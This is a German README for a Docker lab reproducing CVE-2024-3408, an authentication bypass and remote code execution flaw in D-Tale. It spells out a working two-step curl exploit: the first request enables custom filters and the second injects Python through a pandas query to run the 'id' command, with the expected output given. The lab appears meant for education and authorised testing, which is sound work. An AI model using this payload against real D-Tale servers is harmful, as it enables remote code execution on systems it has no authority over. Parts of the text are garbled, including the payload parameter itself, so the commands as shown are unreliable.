
Vuln-Labor für CVE-2024-3408 - D-Tale Authentifizierungsumgehung & RCE
Wiederholbare Laborumgebung für CVE-2024-3408, eine Authentifizierungsumgehung und Remote-Codeausführungs-Schwachstelle in D-Tale.
D-Tale-Versionen bis 3.15.1 sind anfällig aufgrund von:
"Dtale") für die Flask-Sitzungssignierung – ermöglicht Fälschung von Sitzungs-Cookiestest-filter verwendet pandas query, was missbraucht werden kann, um beliebigen Python-Code auszuführenCVSS: 9.8 (Kritisch)
Betroffen: D-Tale <= 3.15.1
docker compose up -d --build
D-Tale ist verfügbar unter http://localhost:40000
# Schritt 1: Benutzerdefinierte Filter aktivieren
curl -s "http://localhost:40000/dtale/update-settings/1?settings=%7B%22enable_custom_filters%22%3Atrue%7D"
# Erwartet: {"success":true}
# Schritt 2: Befehl über pandas-Query-Injection ausführen
curl -s -G "http://localhost:40000/dtale/test-filter/1" \
--data-urlencode "[email protected].__import__('os').popen('id').read()"
# Erwartet: Antwort enthält "uid=" und "gid=" (Befehlsausgabe in Fehlermeldung)
docker compose down
Dieses Labor dient nur zu Bildungszwecken und autorisierten Sicherheitstests. Verwenden Sie es nicht gegen Systeme, die Sie nicht besitzen oder für die Sie keine Testberechtigung haben.